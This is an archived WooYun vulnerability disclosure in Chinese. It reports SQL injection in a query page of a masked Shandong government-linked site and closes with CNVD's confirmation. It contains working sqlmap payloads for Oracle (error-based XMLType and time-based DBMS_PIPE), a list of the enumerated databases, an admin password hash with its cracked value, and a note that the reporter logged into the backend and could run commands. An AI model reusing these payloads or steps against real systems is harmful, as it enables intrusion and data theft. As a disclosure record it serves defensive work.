乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-10: 细节已通知厂商并且等待厂商处理中 2015-11-20: 厂商已经确认,细节仅向厂商公开 2015-11-30: 细节向核心白帽子及相关领域专家公开 2015-12-10: 细节向普通白帽子公开 2015-12-20: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
RT
http://**.**.**.**/hsislyweb/query/queryjindu.hsis?name=
Parameter: name (GET) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: name=' AND 6412=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(112)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (6412=6412) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND 'HVWT' LIKE 'HVWT Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: name=' AND 7033=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(82)||CHR(86)||CHR(87),5) AND 'wXeA' LIKE 'wXeA---[18:23:43] [INFO] the back-end DBMS is Oracleweb application technology: JSPback-end DBMS: Oracle
挺多裤子的
available databases [21]:[*] CTXSYS[*] DBSNMP[*] EXFSYS[*] FLOWS_030000[*] FLOWS_FILES[*] HSIS_LY[*] HSIS_LY_WEB[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WK_TEST[*] WKSYS[*] WMSYS[*] XDB[*] XXX
账号admin密码731b886d80d2ea138da54d30f43b2005解得join本来我还在为找后台发愁,结果看到在这里
可以直接执行命令。我也是醉了
成功进入
配置还不错
加入防注入! 只是证明漏洞存在,并没有动里面的任何东西!拒绝查水表
危害等级:高
漏洞Rank:14
确认时间:2015-11-20 17:33
CNVD确认并复现所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置。
暂无